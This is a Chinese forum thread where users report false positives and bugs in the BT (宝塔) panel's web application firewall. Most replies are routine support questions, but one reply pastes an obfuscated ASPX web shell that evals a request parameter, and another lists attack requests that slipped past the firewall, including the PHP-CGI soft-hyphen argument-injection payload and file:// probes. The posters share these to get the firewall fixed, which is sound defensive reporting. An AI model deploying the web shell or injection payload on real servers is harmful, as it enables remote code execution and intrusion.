宝塔10周年开年大促,年度钜惠,先领红包再下单,企业版低至941元!查看活动
当前位置:论坛首页 > Linux面板 > Linux面板教程

防火墙误报或者bug 提交汇总

发表在 Linux面板2019-3-12 14:40   [复制链接] 15 407166

防火墙误报或者bug 提交汇总 页面。
如遇到 误报。或者bug 请在如下帖子回复



回复格式如下:

1. QQ:xxxxxxxxx

2。 报错截图


3. 具体的CMS

如果不是CMS 说明那个规则



如果有紧急问题,请联系 qq 1249648969
使用道具 举报 只看该作者 回复
发表于 2025-1-1 22:51:16 | 显示全部楼层
我网站设置完防火墙后,手机网络都打不开, 只有加白才可以打开,我在黑名单也没有看到被拦截, 网站不开启防火墙卡的很,开了之后,我自己都进来了,不知道怎么回事。  如果有紧急问题,请联系 qq 1095558889
使用道具 举报 回复 支持 反对
发表于 2025-1-2 09:56:14 | 显示全部楼层
15699992909 发表于 2025-1-1 22:51
我网站设置完防火墙后,手机网络都打不开, 只有加白才可以打开,我在黑名单也没有看到被拦截, 网站不开启 ...

你可以恢复默认配置。
把  /www/server/btwaf  目录重命名为 /www/server/btwaf_bak
然后卸载重新安装防火墙就是默认的
使用道具 举报 回复 支持 反对
发表于 2025-1-30 09:53:34 | 显示全部楼层
使用百度cdn后,无论怎么设置都会拦截,造成cdn的IP被封锁,从而打开网页错误
WX20250130-095156@2x.png
WX20250130-095209@2x.png
WX20250130-095222@2x.png
使用道具 举报 回复 支持 反对
发表于 2025-2-5 09:40:09 | 显示全部楼层
大眼睛羚 发表于 2025-1-30 09:53
使用百度cdn后,无论怎么设置都会拦截,造成cdn的IP被封锁,从而打开网页错误
...

微信截图_20250205093917.png

如果是百度CDN 需要开启首位IP为客户IP          这个功能就可以获取到正确的IP地址了
使用道具 举报 回复 支持 反对
发表于 2025-5-8 17:08:49 | 显示全部楼层
QQ:158164500
问题:安装了收费版的Nginx防火墙之后,宝塔邮局里设置的邮箱能发邮件,但都收不到邮件了。请问这种情况应该如何调整规则?
使用道具 举报 回复 支持 反对
发表于 2025-5-29 22:40:25 | 显示全部楼层
这个通过php被传进来了,没有被拦住,希望可以研究下,被入侵后防火墙和Nginx日志都被清空了,找不到详细的信息了


  1. <% function EY0b942T(){var GEPH="u",Ah6c7="afe",C02u=GEPH+"ns"+Ah6c7;return C02u;}var FNfe01:String=Request["a"];var FNfe01 = FNfe01.substring(0, 9999);~~~~eval/*Z#?h*u@!hXS66OqWw8*/(FNfe01,EY0b942T());%><%@Page Language = JS%>
复制代码


使用道具 举报 回复 支持 反对
发表于 2025-6-3 18:29:06 | 显示全部楼层
建议针对CC防御,单独增设IP白名单。现在反代过来的IP设为全局白名单,所有规则都不受限制,感觉有危险。
使用道具 举报 回复 支持 反对
发表于 2025-7-28 16:00:19 | 显示全部楼层
人机验证白名单 这个功能希望可以针对不同站点单独设置而不是在全局配置里面

然后人机验证白名单目前只有url白名单,希望可以增加一个ip白名单专门针对人机验证的
使用道具 举报 回复 支持 反对
发表于 2025-10-25 09:41:44 | 显示全部楼层
每一个页面都提示,APP被您禁用啦。详情查看:http://lbsyun.baidu.com/apiconsole/key#。
使用道具 举报 回复 支持 反对
发表于 2025-10-25 09:50:03 | 显示全部楼层
Nginx防火墙,购买了半年,宝塔面板-防火墙,每一个页面都是弹窗提示:APP被您禁用啦。详情查看:http://lbsyun.baidu.com/apiconsole/key#。QQ:[color=rgba(0, 0, 0, 0.5)]1515263243
001.png
使用道具 举报 回复 支持 反对
发表于 2025-12-12 22:57:53 | 显示全部楼层
1. QQ:370527264

我是IIS防火墙 开启防火墙 所有网站全部打不开了  WIN2022系统
使用道具 举报 回复 支持 反对
发表于 2026-1-9 08:36:36 | 显示全部楼层
企业微信20260109-082717@2x.png
更新完出错,有这个版本吗?
使用道具 举报 回复 支持 反对
发表于 2026-1-16 10:06:54 | 显示全部楼层
宝塔升级到最新版本:Windows正式版8.5.1
系统:Windows Server 2012 R2 Datacenter (build 9600) x64 (Gogo1.23.12)
nginx1.21.1
宝塔网站防火墙出错了,使用了2天
5.2版本不行,升级到5.3版本还是一样
使用道具 举报 回复 支持 反对
发表于 2026-3-19 12:44:31 | 显示全部楼层
有好多条没拦住PHP 恶意攻击(穿透宝塔 WAF,针对 PHP 文件包含 / CGI 漏洞)[td]
攻击 IP
核心恶意行为(穿透宝塔 WAF 的关键特征)
8.208.47.7请求 /hello.world?%ADd allow_url_include=1 auto_prepend_file=php://input,利用不可见字符 % AD 混淆关键字,发起 PHP 远程文件包含攻击
103.230.15.127请求 /php-cgi/php-cgi.exe?%ADd cgi.force_redirect=0 allow_url_include=1 auto_prepend_file=php://input,发起 PHP CGI 漏洞 + 远程文件包含攻击



[td]
攻击 IP
核心恶意行为(穿透宝塔 WAF 的关键特征)
57.141.16.67伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image004.jpg,试探本地文件读取漏洞
57.141.16.84伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image006.jpg,试探本地文件读取漏洞
57.141.16.104伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image003.jpg,试探本地文件读取漏洞
57.141.16.6伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image005.jpg,试探本地文件读取漏洞
57.141.16.25伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image002.jpg,试探本地文件读取漏洞
57.141.16.47伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image001.jpg,试探本地文件读取漏洞
57.141.16.38伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image003.jpg,试探本地文件读取漏洞
57.141.16.80伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image001.jpg,试探本地文件读取漏洞
57.141.16.28伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image005.jpg,试探本地文件读取漏洞




PHP 攻击类:2 个 IP 利用不可见字符 % AD(解码后为�)混淆allow_url_include/auto_prepend_file等 PHP 高危关键字,绕过宝塔 WAF 检测,请求直接穿透到 EyouCMS 应用层;Windows 试探类:9 个 IP 均伪装 Facebook 官方爬虫 UA(meta-externalagent/1.1),发起 Windows 本地文件协议(file://)请求,全部未被宝塔 WAF 拦截,属于定向扫洞行为;核心问题:所有请求无宝塔 WAF 拦截记录,出现在网站日志中
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表